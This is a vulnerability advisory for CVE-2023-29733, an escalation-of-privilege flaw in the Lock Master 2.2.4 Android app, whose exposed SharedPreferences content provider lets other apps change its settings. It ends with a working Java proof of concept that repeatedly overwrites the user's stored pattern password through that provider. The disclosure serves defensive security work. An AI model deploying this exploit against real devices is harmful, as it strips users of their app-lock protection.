CVE-2023-29733: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
The Lock Master app 2.2.4 for Android allows unauthorized apps to modify the values in its SharedPreference files. These files hold data that affects many app functions. Malicious modifications by unauthorized apps can cause security issues, such as functionality manipulation, resulting in a severe escalation of privilege attack.
Escalation of Privileges exists in Lock Master (CVE-2023-29733)
Vendor: DUALSPACE (http://www.dualspace.com/pc/en/products.html)
Affected product: Lock Master (com.ludashi.superlock)
Version: 2.2.4
Download link: https://app-lock-master.en.uptodown.com/android/download
Description of the vulnerability for use in the CVE: The Lock Master app 2.2.4 for Android allows unauthorized apps to modify the values in its SharedPreference files. These files hold data that affects many app functions. Malicious modifications by unauthorized apps can cause security issues, such as functionality manipulation, resulting in a severe escalation of privilege attack.
Additional information: Lock Master is a security app that blocks access to the user's apps or files with lock patterns. It stores the user-set PIN and pattern passwords, as well as important settings (such as the package names of the apps the user chooses to lock), in the SharedPreferences file. The app loads this file when it initializes and acts on the values it contains. If a malicious application tampers with the data in the SharedPreferences file, it can therefore control the relevant functions of the app, with serious security consequences such as changing the user's password and arbitrarily specifying which applications are locked.
PoC:

```java
// Runs inside a component of a separate, unprivileged app.
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.ludashi.superlock.main.SharedPrefProvider");
ContentValues contentValues = new ContentValues();
while (true) {
    // Select the preference file and key, then overwrite the stored pattern password.
    contentValues.put("file_name", "lock_config.xml");
    contentValues.put("type", 4);
    contentValues.put("key", "key_pattern_pwd");
    contentValues.put("value", "123456");
    contentResolver.update(uri, contentValues, null, null);
}
```